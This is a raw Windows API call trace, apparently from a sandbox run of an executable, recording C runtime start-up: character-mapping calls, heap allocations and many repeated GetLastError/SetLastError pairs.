!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.675] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鍚߁멯@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0097.675] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿäÀ\x8d\x05\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6b40, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0097.675] GetLastError () returned 0x0 [0097.675] SetLastError (dwErrCode=0x0) [0097.675] GetLastError () returned 0x0 [0097.675] SetLastError (dwErrCode=0x0) [0097.675] GetLastError () returned 0x0 [0097.675] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.677] SetLastError (dwErrCode=0x0) [0097.677] GetLastError () returned 0x0 [0097.678] SetLastError (dwErrCode=0x0) [0097.678] GetLastError () returned 0x0 [0097.678] SetLastError (dwErrCode=0x0) [0097.678] GetLastError () returned 0x0 [0097.678] SetLastError (dwErrCode=0x0) [0097.678] GetLastError () returned 0x0 [0097.678] SetLastError (dwErrCode=0x0) [0097.678] GetLastError () returned 0x0 [0097.679] SetLastError (dwErrCode=0x0) [0097.679] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.681] SetLastError (dwErrCode=0x0) [0097.681] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.682] GetLastError () returned 0x0 [0097.682] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.683] SetLastError (dwErrCode=0x0) [0097.683] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.685] SetLastError (dwErrCode=0x0) [0097.685] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.686] SetLastError (dwErrCode=0x0) [0097.686] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.687] SetLastError (dwErrCode=0x0) [0097.687] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.688] SetLastError (dwErrCode=0x0) [0097.688] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.689] GetLastError () returned 0x0 [0097.689] SetLastError (dwErrCode=0x0) [0097.690] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x0, Size=0x70) returned 0x1fa1990 [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.690] SetLastError (dwErrCode=0x0) [0097.690] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.691] GetLastError () returned 0x0 [0097.691] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.692] SetLastError (dwErrCode=0x0) [0097.692] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.693] SetLastError (dwErrCode=0x0) [0097.693] GetLastError () returned 0x0 [0097.694] SetLastError (dwErrCode=0x0) [0097.694] GetLastError () returned 0x0 [0097.694] SetLastError (dwErrCode=0x0) [0097.694] GetLastError () returned 0x0 [0097.694] SetLastError (dwErrCode=0x0) [0097.694] GetLastError () returned 0x0 [0097.694] SetLastError (dwErrCode=0x0) [0097.694] GetLastError () returned 0x0 [0097.694] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.695] SetLastError (dwErrCode=0x0) [0097.695] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.696] SetLastError (dwErrCode=0x0) [0097.696] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.697] SetLastError (dwErrCode=0x0) [0097.697] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.698] SetLastError (dwErrCode=0x0) [0097.698] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.699] GetLastError () returned 0x0 [0097.699] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.700] SetLastError (dwErrCode=0x0) [0097.700] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.702] GetLastError () returned 0x0 [0097.702] SetLastError (dwErrCode=0x0) [0097.702] GetLastError () returned 0x0 [0097.702] SetLastError (dwErrCode=0x0) [0097.702] GetLastError () returned 0x0 [0097.702] SetLastError (dwErrCode=0x0) [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x98) returned 0x1fa1a08 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1f) returned 0x1fa1aa8 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x36) returned 0x1fa1ad0 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x37) returned 0x1fa1b10 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x3c) returned 0x1fa1b50 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x31) returned 0x1fa1b98 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x17) returned 0x1fa1bd8 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x24) returned 0x1fa1bf8 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x14) returned 0x1fa1c28 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0xd) returned 0x1fa1c48 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x25) returned 0x1fa1c60 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x39) returned 0x1fa1c90 [0097.702] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x18) returned 0x1fa1cd8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x17) returned 0x1fa1cf8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0xe) returned 0x1fa1d18 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x69) returned 0x1fa1d30 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x3e) returned 0x1fa1da8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1b) returned 0x1fa1df0 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1d) returned 0x1fa1e18 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x48) returned 0x1fa1e40 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x12) returned 0x1fa1e90 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x18) returned 0x1fa1eb0 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1b) returned 0x1fa1ed0 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x24) returned 0x1fa1ef8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x29) returned 0x1fa1f28 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1e) returned 0x1fa1f60 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x41) returned 0x1fa1f88 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x17) returned 0x1fa1fd8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0xf) returned 0x1fa1ff8 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x16) returned 0x1fa2010 [0097.703] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x2a) returned 0x1fa2030 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x29) returned 0x1fa2068 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x15) returned 0x1fa20a0 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x1e) returned 0x1fa20c0 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x2a) returned 0x1fa20e8 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x12) returned 0x1fa2120 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x18) returned 0x1fa2140 [0097.704] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x46) returned 0x1fa2160 [0097.704] HeapFree (in: hHeap=0x1fa0000, dwFlags=0x0, lpMem=0x1fa11f8 | out: hHeap=0x1fa0000) returned 1 [0097.704] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0097.704] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0097.704] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0097.706] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x800) returned 0x1fa21b0 [0097.706] RtlAllocateHeap (HeapHandle=0x1fa0000, Flags=0x8, Size=0x80) returned 0x1fa11f8 [0097.706] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4056dc) returned 0x0 [0097.706] RtlSizeHeap (HeapHandle=0x1fa0000, Flags=0x0, MemoryPointer=0x1fa11f8) returned 0x80 [0097.707] GetLastError () returned 0x0 [0097.707] SetLastError (dwErrCode=0x0) [0097.707] GetLastError () returned 0x0 [0097.707] SetLastError (dwErrCode=0x0) [0097.707] GetLastError () returned 0x0 [0097.707] SetLastError (dwErrCode=0x0) [0097.707] GetLastError () returned 0x0 [0097.707] SetLastError (dwErrCode=0x0) [0097.707] GetLastError () returned 0x0 [0097.707] SetLastError (dwErrCode=0x0) [0097.707] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.708] SetLastError (dwErrCode=0x0) [0097.708] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.709] SetLastError (dwErrCode=0x0) [0097.709] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.710] SetLastError (dwErrCode=0x0) [0097.710] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.711] SetLastError (dwErrCode=0x0) [0097.711] GetLastError () returned 0x0 [0097.712] 